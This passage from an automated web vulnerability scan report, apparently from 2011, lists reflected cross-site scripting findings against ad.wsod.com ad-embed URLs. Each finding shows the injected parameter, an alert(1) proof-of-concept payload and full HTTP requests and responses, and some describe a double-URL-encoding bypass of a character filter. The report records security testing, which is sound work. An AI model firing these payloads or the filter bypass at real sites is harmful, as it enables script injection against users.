       i.src = 'http://g.msn.com/_2AD0003L/93000000000038010.1?!5eff5'-alert(1)-'4670c7c8014&&PID=8479898&UIT=G&TargetID=28253488&AN=2030060152&PG=INVSRQ&ASID=5ce48c628db348bd86a7cea7290e54ad';
               var iRM = new Image();
       iRM.src = 'http://view.atdmt.com/action/Scottrade_Remessaging';
               re
...[SNIP]...

5.74. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/353.0.js.120x30/1303843218** [AN parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.wsod.com
Path:   /embed/8bec9b10877d5d7fd7c0fb6e6a631357/353.0.js.120x30/1303843218**

Issue detail

The value of the AN request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 52705'-alert(1)-'5838e5807a8 was submitted in the AN parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /embed/8bec9b10877d5d7fd7c0fb6e6a631357/353.0.js.120x30/1303843218**;10,2,154;1920;1200;http%3A_@2F_@2Fmoney.msn.com_@2Finvesting_@2F?click=http://g.msn.com/_2AD0003L/93000000000038010.1?!&&PID=8479898&UIT=G&TargetID=28253488&AN=203006015252705'-alert(1)-'5838e5807a8&PG=INVSRQ&ASID=5ce48c628db348bd86a7cea7290e54ad HTTP/1.1
Host: ad.wsod.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: u=4db02685bd604; i_1=33:1391:835:0:0:40771:1303842976:B2|33:1359:827:0:0:40771:1303842932:B2|33:967:555:0:0:44824:1303567229:L

Response

HTTP/1.1 200 OK
Server: nginx/0.6.39
Date: Tue, 26 Apr 2011 18:41:45 GMT
Content-Type: text/html; charset=UTF-8
Connection: keep-alive
X-Powered-By: PHP/5.1.6
Set-Cookie: u=4db02685bd604; expires=Fri, 27-May-2011 18:41:45 GMT; path=/
Set-Cookie: i_1=33:353:198:141:0:45001:1303843305:L|33:1391:835:0:0:40771:1303842976:B2|33:1359:827:0:0:40771:1303842932:B2; expires=Thu, 26-May-2011 18:41:45 GMT; path=/
P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Length: 858

   function wsodOOBClick() {
       var i = new Image();
       i.src = 'http://g.msn.com/_2AD0003L/93000000000038010.1?!&&PID=8479898&UIT=G&TargetID=28253488&AN=203006015252705'-alert(1)-'5838e5807a8&PG=INVSRQ&ASID=5ce48c628db348bd86a7cea7290e54ad';
               var iRM = new Image();
       iRM.src = 'http://view.atdmt.com/action/Scottrade_Remessaging';
               return true;
   }
       function wsod_image353() {
       docume
...[SNIP]...

5.75. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/353.0.js.120x30/1303843218** [ASID parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.wsod.com
Path:   /embed/8bec9b10877d5d7fd7c0fb6e6a631357/353.0.js.120x30/1303843218**

Issue detail

The value of the ASID request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 9d0a2'-alert(1)-'eddc83441b0 was submitted in the ASID parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /embed/8bec9b10877d5d7fd7c0fb6e6a631357/353.0.js.120x30/1303843218**;10,2,154;1920;1200;http%3A_@2F_@2Fmoney.msn.com_@2Finvesting_@2F?click=http://g.msn.com/_2AD0003L/93000000000038010.1?!&&PID=8479898&UIT=G&TargetID=28253488&AN=2030060152&PG=INVSRQ&ASID=5ce48c628db348bd86a7cea7290e54ad9d0a2'-alert(1)-'eddc83441b0 HTTP/1.1
Host: ad.wsod.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: u=4db02685bd604; i_1=33:1391:835:0:0:40771:1303842976:B2|33:1359:827:0:0:40771:1303842932:B2|33:967:555:0:0:44824:1303567229:L

Response

HTTP/1.1 200 OK
Server: nginx/0.6.39
Date: Tue, 26 Apr 2011 18:41:59 GMT
Content-Type: text/html; charset=UTF-8
Connection: keep-alive
X-Powered-By: PHP/5.1.6
Set-Cookie: u=4db02685bd604; expires=Fri, 27-May-2011 18:41:59 GMT; path=/
Set-Cookie: i_1=33:353:198:141:0:45001:1303843319:L|33:1391:835:0:0:40771:1303842976:B2|33:1359:827:0:0:40771:1303842932:B2; expires=Thu, 26-May-2011 18:41:59 GMT; path=/
P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Length: 858

   function wsodOOBClick() {
       var i = new Image();
       i.src = 'http://g.msn.com/_2AD0003L/93000000000038010.1?!&&PID=8479898&UIT=G&TargetID=28253488&AN=2030060152&PG=INVSRQ&ASID=5ce48c628db348bd86a7cea7290e54ad9d0a2'-alert(1)-'eddc83441b0';
               var iRM = new Image();
       iRM.src = 'http://view.atdmt.com/action/Scottrade_Remessaging';
               return true;
   }
       function wsod_image353() {
       document.write('<a href="//ad.wsod.com/click/8bec9b108
...[SNIP]...

5.76. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/353.0.js.120x30/1303843218** [PG parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.wsod.com
Path:   /embed/8bec9b10877d5d7fd7c0fb6e6a631357/353.0.js.120x30/1303843218**

Issue detail

The value of the PG request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload c3646'-alert(1)-'9d3890ffc58 was submitted in the PG parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /embed/8bec9b10877d5d7fd7c0fb6e6a631357/353.0.js.120x30/1303843218**;10,2,154;1920;1200;http%3A_@2F_@2Fmoney.msn.com_@2Finvesting_@2F?click=http://g.msn.com/_2AD0003L/93000000000038010.1?!&&PID=8479898&UIT=G&TargetID=28253488&AN=2030060152&PG=INVSRQc3646'-alert(1)-'9d3890ffc58&ASID=5ce48c628db348bd86a7cea7290e54ad HTTP/1.1
Host: ad.wsod.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: u=4db02685bd604; i_1=33:1391:835:0:0:40771:1303842976:B2|33:1359:827:0:0:40771:1303842932:B2|33:967:555:0:0:44824:1303567229:L

Response

HTTP/1.1 200 OK
Server: nginx/0.6.39
Date: Tue, 26 Apr 2011 18:41:55 GMT
Content-Type: text/html; charset=UTF-8
Connection: keep-alive
X-Powered-By: PHP/5.1.6
Set-Cookie: u=4db02685bd604; expires=Fri, 27-May-2011 18:41:55 GMT; path=/
Set-Cookie: i_1=33:353:198:141:0:45001:1303843315:L|33:1391:835:0:0:40771:1303842976:B2|33:1359:827:0:0:40771:1303842932:B2; expires=Thu, 26-May-2011 18:41:55 GMT; path=/
P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Length: 858

   function wsodOOBClick() {
       var i = new Image();
       i.src = 'http://g.msn.com/_2AD0003L/93000000000038010.1?!&&PID=8479898&UIT=G&TargetID=28253488&AN=2030060152&PG=INVSRQc3646'-alert(1)-'9d3890ffc58&ASID=5ce48c628db348bd86a7cea7290e54ad';
               var iRM = new Image();
       iRM.src = 'http://view.atdmt.com/action/Scottrade_Remessaging';
               return true;
   }
       function wsod_image353() {
       document.write('
...[SNIP]...

5.77. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/353.0.js.120x30/1303843218** [TargetID parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.wsod.com
Path:   /embed/8bec9b10877d5d7fd7c0fb6e6a631357/353.0.js.120x30/1303843218**

Issue detail

The value of the TargetID request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 7d724'-alert(1)-'aba732753ad was submitted in the TargetID parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /embed/8bec9b10877d5d7fd7c0fb6e6a631357/353.0.js.120x30/1303843218**;10,2,154;1920;1200;http%3A_@2F_@2Fmoney.msn.com_@2Finvesting_@2F?click=http://g.msn.com/_2AD0003L/93000000000038010.1?!&&PID=8479898&UIT=G&TargetID=282534887d724'-alert(1)-'aba732753ad&AN=2030060152&PG=INVSRQ&ASID=5ce48c628db348bd86a7cea7290e54ad HTTP/1.1
Host: ad.wsod.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: u=4db02685bd604; i_1=33:1391:835:0:0:40771:1303842976:B2|33:1359:827:0:0:40771:1303842932:B2|33:967:555:0:0:44824:1303567229:L

Response

HTTP/1.1 200 OK
Server: nginx/0.6.39
Date: Tue, 26 Apr 2011 18:41:41 GMT
Content-Type: text/html; charset=UTF-8
Connection: keep-alive
X-Powered-By: PHP/5.1.6
Set-Cookie: u=4db02685bd604; expires=Fri, 27-May-2011 18:41:41 GMT; path=/
Set-Cookie: i_1=33:353:198:141:0:45001:1303843301:L|33:1391:835:0:0:40771:1303842976:B2|33:1359:827:0:0:40771:1303842932:B2; expires=Thu, 26-May-2011 18:41:41 GMT; path=/
P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Length: 858

   function wsodOOBClick() {
       var i = new Image();
       i.src = 'http://g.msn.com/_2AD0003L/93000000000038010.1?!&&PID=8479898&UIT=G&TargetID=282534887d724'-alert(1)-'aba732753ad&AN=2030060152&PG=INVSRQ&ASID=5ce48c628db348bd86a7cea7290e54ad';
               var iRM = new Image();
       iRM.src = 'http://view.atdmt.com/action/Scottrade_Remessaging';
               return true;
   }
       function wsod_image35
...[SNIP]...

5.78. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/353.0.js.120x30/1303843218** [UIT parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.wsod.com
Path:   /embed/8bec9b10877d5d7fd7c0fb6e6a631357/353.0.js.120x30/1303843218**

Issue detail

The value of the UIT request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload c2488'-alert(1)-'0a19383e732 was submitted in the UIT parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /embed/8bec9b10877d5d7fd7c0fb6e6a631357/353.0.js.120x30/1303843218**;10,2,154;1920;1200;http%3A_@2F_@2Fmoney.msn.com_@2Finvesting_@2F?click=http://g.msn.com/_2AD0003L/93000000000038010.1?!&&PID=8479898&UIT=Gc2488'-alert(1)-'0a19383e732&TargetID=28253488&AN=2030060152&PG=INVSRQ&ASID=5ce48c628db348bd86a7cea7290e54ad HTTP/1.1
Host: ad.wsod.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: u=4db02685bd604; i_1=33:1391:835:0:0:40771:1303842976:B2|33:1359:827:0:0:40771:1303842932:B2|33:967:555:0:0:44824:1303567229:L

Response

HTTP/1.1 200 OK
Server: nginx/0.6.39
Date: Tue, 26 Apr 2011 18:41:34 GMT
Content-Type: text/html; charset=UTF-8
Connection: keep-alive
X-Powered-By: PHP/5.1.6
Set-Cookie: u=4db02685bd604; expires=Fri, 27-May-2011 18:41:34 GMT; path=/
Set-Cookie: i_1=33:353:198:141:0:45001:1303843294:L|33:1391:835:0:0:40771:1303842976:B2|33:1359:827:0:0:40771:1303842932:B2; expires=Thu, 26-May-2011 18:41:34 GMT; path=/
P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Length: 858

   function wsodOOBClick() {
       var i = new Image();
       i.src = 'http://g.msn.com/_2AD0003L/93000000000038010.1?!&&PID=8479898&UIT=Gc2488'-alert(1)-'0a19383e732&TargetID=28253488&AN=2030060152&PG=INVSRQ&ASID=5ce48c628db348bd86a7cea7290e54ad';
               var iRM = new Image();
       iRM.src = 'http://view.atdmt.com/action/Scottrade_Remessaging';
               return true;
   }
       fun
...[SNIP]...

5.79. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/353.0.js.120x30/1303843218** [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.wsod.com
Path:   /embed/8bec9b10877d5d7fd7c0fb6e6a631357/353.0.js.120x30/1303843218**

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload b2bdf'-alert(1)-'051170363a0 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /embed/8bec9b10877d5d7fd7c0fb6e6a631357/353.0.js.120x30/1303843218**;10,2,154;1920;1200;http%3A_@2F_@2Fmoney.msn.com_@2Finvesting_@2F?click=http://g.msn.com/_2AD0003L/93000000000038010.1?!&&PID=8479898&UIT=G&TargetID=28253488&AN=2030060152&PG=INVSRQ&ASID=5ce48c628db348bd86a7cea7290e54ad&b2bdf'-alert(1)-'051170363a0=1 HTTP/1.1
Host: ad.wsod.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: u=4db02685bd604; i_1=33:1391:835:0:0:40771:1303842976:B2|33:1359:827:0:0:40771:1303842932:B2|33:967:555:0:0:44824:1303567229:L

Response

HTTP/1.1 200 OK
Server: nginx/0.6.39
Date: Tue, 26 Apr 2011 18:42:04 GMT
Content-Type: text/html; charset=UTF-8
Connection: keep-alive
X-Powered-By: PHP/5.1.6
Set-Cookie: u=4db02685bd604; expires=Fri, 27-May-2011 18:42:04 GMT; path=/
Set-Cookie: i_1=33:353:516:141:0:45001:1303843324:L|33:1391:835:0:0:40771:1303842976:B2|33:1359:827:0:0:40771:1303842932:B2; expires=Thu, 26-May-2011 18:42:04 GMT; path=/
P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Length: 855

   function wsodOOBClick() {
       var i = new Image();
       i.src = 'http://g.msn.com/_2AD0003L/93000000000038010.1?!&&PID=8479898&UIT=G&TargetID=28253488&AN=2030060152&PG=INVSRQ&ASID=5ce48c628db348bd86a7cea7290e54ad&b2bdf'-alert(1)-'051170363a0=1';
               var iRM = new Image();
       iRM.src = 'http://view.atdmt.com/action/Scottrade_Remessaging';
               return true;
   }
       function wsod_image353() {
       document.write('<a href="//ad.wsod.com/click/8bec9b1
...[SNIP]...

5.80. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/353.0.js.120x30/1797458628 [&PID parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.wsod.com
Path:   /embed/8bec9b10877d5d7fd7c0fb6e6a631357/353.0.js.120x30/1797458628

Issue detail

The value of the &PID request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload d8654"-alert(1)-"c50bffdece4 was submitted in the &PID parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /embed/8bec9b10877d5d7fd7c0fb6e6a631357/353.0.js.120x30/1797458628?click=http://g.msn.com/_2AD0003L/93000000000038010.1?!&&PID=8479898d8654"-alert(1)-"c50bffdece4&UIT=G&TargetID=28253488&AN=1797458628&PG=INVSRQ&ASID=5a9d1d95557d4344b789fe7d2c3b33e3 HTTP/1.1
Host: ad.wsod.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: u=4db02685bd604; i_1=33:1359:827:0:0:40771:1303842932:B2|33:967:555:0:0:44824:1303567229:L|23:257:845:6:0:44608:1303389835:L

Response

HTTP/1.1 200 OK
Server: nginx/0.6.39
Date: Tue, 26 Apr 2011 18:36:57 GMT
Content-Type: text/html; charset=UTF-8
Connection: keep-alive
X-Powered-By: PHP/5.1.6
P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Length: 1681

   function fpv() {
       try {
           if(navigator.mimeTypes["application/x-shockwave-flash"].enabledPlugin){
               return (navigator.plugins["Shockwave Flash 2.0"] || navigator.plugins["Shockwave Flash"]).descr
...[SNIP]...
oto+'//ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/353.0.js.120x30/1303843017**;'+wsod.fp+';'+wsod.w+';'+wsod.h+';'+wsod.loc+'?click=http://g.msn.com/_2AD0003L/93000000000038010.1?!&&PID=8479898d8654"-alert(1)-"c50bffdece4&UIT=G&TargetID=28253488&AN=1797458628&PG=INVSRQ&ASID=5a9d1d95557d4344b789fe7d2c3b33e3">
...[SNIP]...

5.81. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/353.0.js.120x30/1797458628 [AN parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.wsod.com
Path:   /embed/8bec9b10877d5d7fd7c0fb6e6a631357/353.0.js.120x30/1797458628

Issue detail

The value of the AN request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 610b1"-alert(1)-"b260c77153e was submitted in the AN parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /embed/8bec9b10877d5d7fd7c0fb6e6a631357/353.0.js.120x30/1797458628?click=http://g.msn.com/_2AD0003L/93000000000038010.1?!&&PID=8479898&UIT=G&TargetID=28253488&AN=1797458628610b1"-alert(1)-"b260c77153e&PG=INVSRQ&ASID=5a9d1d95557d4344b789fe7d2c3b33e3 HTTP/1.1
Host: ad.wsod.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: u=4db02685bd604; i_1=33:1359:827:0:0:40771:1303842932:B2|33:967:555:0:0:44824:1303567229:L|23:257:845:6:0:44608:1303389835:L

Response

HTTP/1.1 200 OK
Server: nginx/0.6.39
Date: Tue, 26 Apr 2011 18:37:10 GMT
Content-Type: text/html; charset=UTF-8
Connection: keep-alive
X-Powered-By: PHP/5.1.6
P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Length: 1681

   function fpv() {
       try {
           if(navigator.mimeTypes["application/x-shockwave-flash"].enabledPlugin){
               return (navigator.plugins["Shockwave Flash 2.0"] || navigator.plugins["Shockwave Flash"]).descr
...[SNIP]...
d7fd7c0fb6e6a631357/353.0.js.120x30/1303843030**;'+wsod.fp+';'+wsod.w+';'+wsod.h+';'+wsod.loc+'?click=http://g.msn.com/_2AD0003L/93000000000038010.1?!&&PID=8479898&UIT=G&TargetID=28253488&AN=1797458628610b1"-alert(1)-"b260c77153e&PG=INVSRQ&ASID=5a9d1d95557d4344b789fe7d2c3b33e3">
...[SNIP]...

5.82. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/353.0.js.120x30/1797458628 [ASID parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.wsod.com
Path:   /embed/8bec9b10877d5d7fd7c0fb6e6a631357/353.0.js.120x30/1797458628

Issue detail

The value of the ASID request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 8199f"-alert(1)-"f38ee686c59 was submitted in the ASID parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /embed/8bec9b10877d5d7fd7c0fb6e6a631357/353.0.js.120x30/1797458628?click=http://g.msn.com/_2AD0003L/93000000000038010.1?!&&PID=8479898&UIT=G&TargetID=28253488&AN=1797458628&PG=INVSRQ&ASID=5a9d1d95557d4344b789fe7d2c3b33e38199f"-alert(1)-"f38ee686c59 HTTP/1.1
Host: ad.wsod.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: u=4db02685bd604; i_1=33:1359:827:0:0:40771:1303842932:B2|33:967:555:0:0:44824:1303567229:L|23:257:845:6:0:44608:1303389835:L

Response

HTTP/1.1 200 OK
Server: nginx/0.6.39
Date: Tue, 26 Apr 2011 18:37:19 GMT
Content-Type: text/html; charset=UTF-8
Connection: keep-alive
X-Powered-By: PHP/5.1.6
P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Length: 1681

   function fpv() {
       try {
           if(navigator.mimeTypes["application/x-shockwave-flash"].enabledPlugin){
               return (navigator.plugins["Shockwave Flash 2.0"] || navigator.plugins["Shockwave Flash"]).descr
...[SNIP]...
;'+wsod.fp+';'+wsod.w+';'+wsod.h+';'+wsod.loc+'?click=http://g.msn.com/_2AD0003L/93000000000038010.1?!&&PID=8479898&UIT=G&TargetID=28253488&AN=1797458628&PG=INVSRQ&ASID=5a9d1d95557d4344b789fe7d2c3b33e38199f"-alert(1)-"f38ee686c59">
...[SNIP]...

5.83. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/353.0.js.120x30/1797458628 [PG parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.wsod.com
Path:   /embed/8bec9b10877d5d7fd7c0fb6e6a631357/353.0.js.120x30/1797458628

Issue detail

The value of the PG request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload eba1a"-alert(1)-"c5e1d0c5d1a was submitted in the PG parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /embed/8bec9b10877d5d7fd7c0fb6e6a631357/353.0.js.120x30/1797458628?click=http://g.msn.com/_2AD0003L/93000000000038010.1?!&&PID=8479898&UIT=G&TargetID=28253488&AN=1797458628&PG=INVSRQeba1a"-alert(1)-"c5e1d0c5d1a&ASID=5a9d1d95557d4344b789fe7d2c3b33e3 HTTP/1.1
Host: ad.wsod.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: u=4db02685bd604; i_1=33:1359:827:0:0:40771:1303842932:B2|33:967:555:0:0:44824:1303567229:L|23:257:845:6:0:44608:1303389835:L

Response

HTTP/1.1 200 OK
Server: nginx/0.6.39
Date: Tue, 26 Apr 2011 18:37:14 GMT
Content-Type: text/html; charset=UTF-8
Connection: keep-alive
X-Powered-By: PHP/5.1.6
P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Length: 1681

   function fpv() {
       try {
           if(navigator.mimeTypes["application/x-shockwave-flash"].enabledPlugin){
               return (navigator.plugins["Shockwave Flash 2.0"] || navigator.plugins["Shockwave Flash"]).descr
...[SNIP]...
e6a631357/353.0.js.120x30/1303843034**;'+wsod.fp+';'+wsod.w+';'+wsod.h+';'+wsod.loc+'?click=http://g.msn.com/_2AD0003L/93000000000038010.1?!&&PID=8479898&UIT=G&TargetID=28253488&AN=1797458628&PG=INVSRQeba1a"-alert(1)-"c5e1d0c5d1a&ASID=5a9d1d95557d4344b789fe7d2c3b33e3">
...[SNIP]...

5.84. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/353.0.js.120x30/1797458628 [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.wsod.com
Path:   /embed/8bec9b10877d5d7fd7c0fb6e6a631357/353.0.js.120x30/1797458628

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload c5ea9%2522%253balert%25281%2529%252f%252f3e6670df6b8 was submitted in the REST URL parameter 2. This input was echoed as c5ea9";alert(1)//3e6670df6b8 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Request

GET /embed/8bec9b10877d5d7fd7c0fb6e6a631357c5ea9%2522%253balert%25281%2529%252f%252f3e6670df6b8/353.0.js.120x30/1797458628?click=http://g.msn.com/_2AD0003L/93000000000038010.1?!&&PID=8479898&UIT=G&TargetID=28253488&AN=1797458628&PG=INVSRQ&ASID=5a9d1d95557d4344b789fe7d2c3b33e3 HTTP/1.1
Host: ad.wsod.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: u=4db02685bd604; i_1=33:1359:827:0:0:40771:1303842932:B2|33:967:555:0:0:44824:1303567229:L|23:257:845:6:0:44608:1303389835:L

Response

HTTP/1.1 200 OK
Server: nginx/0.6.39
Date: Tue, 26 Apr 2011 18:37:32 GMT
Content-Type: text/html; charset=UTF-8
Connection: keep-alive
X-Powered-By: PHP/5.1.6
P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Length: 1681

   function fpv() {
       try {
           if(navigator.mimeTypes["application/x-shockwave-flash"].enabledPlugin){
               return (navigator.plugins["Shockwave Flash 2.0"] || navigator.plugins["Shockwave Flash"]).descr
...[SNIP]...
<scr'+'ipt type="text/javascr'+'ipt" src="'+wsod.proto+'//ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357c5ea9";alert(1)//3e6670df6b8/353.0.js.120x30/1303843052**;'+wsod.fp+';'+wsod.w+';'+wsod.h+';'+wsod.loc+'?click=http://g.msn.com/_2AD0003L/93000000000038010.1?!&&PID=8479898&UIT=G&TargetID=28253488&AN=1797458628&PG=INVSRQ&ASID=5a9
...[SNIP]...

5.85. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/353.0.js.120x30/1797458628 [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.wsod.com
Path:   /embed/8bec9b10877d5d7fd7c0fb6e6a631357/353.0.js.120x30/1797458628

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 5e00b%2522%253balert%25281%2529%252f%252fabbd6d3e408 was submitted in the REST URL parameter 3. This input was echoed as 5e00b";alert(1)//abbd6d3e408 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Request

